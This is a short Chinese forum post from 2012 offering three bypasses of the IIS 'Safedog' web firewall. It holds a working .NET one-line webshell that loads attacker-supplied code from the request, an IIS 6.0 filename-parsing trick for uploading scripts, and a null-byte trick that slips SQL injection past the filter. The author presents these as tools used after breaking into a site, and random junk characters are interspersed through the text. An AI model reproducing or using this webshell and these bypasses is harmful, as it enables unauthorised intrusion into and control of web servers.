1、绕过IIS安全狗的一句话。) U# X7 Z$ M4 l% R. x: G7 s
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
( {3 C4 m! V5 {0 ?9 ?6 M<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。9 ~; h9 ?! E4 T% c
1 c1 k# W( E7 ^/ G2、IIS6.0解析漏洞遇到安全狗。4 E7 G- j0 e0 r; \+ X: K
文件名为
* }5 L4 b6 P% m- f% S' qhttp://www.xxxxx.com/sh3llc0de.asp;1.jpg1 |2 K) G! l1 ?8 @# Z' S% w
- ^4 t- f) ~" E; l; P
这样的会被IIS安全狗果断屏蔽。* x9 C" X+ f% h6 Y- c6 X \3 f
改成如下名称,IIS6一样会解析:# h6 _: Q! \8 P& ?4 ], r. \
www.xxxxx.com/;1.asp;1.jpg
2 F- Q! u1 Y% I
$ [5 J2 S) d8 z4 ?3、安全狗的注入绕过。
! Y% H+ t+ e: h, O- T# E: }! X常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
- E \, P* Q, q* z) X8 _" t但如果:* K2 I2 y; w) q! W+ E% I) |
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1( W6 E: t. |1 B( Y; X
就可以成功绕过了。) u, O: K; l) N2 ]7 d, \
: S. `( L0 o4 T
8 k- ~0 X+ e& j2 p& b
|
发表于 2012-10-31 08:25:30
收藏
支持
反对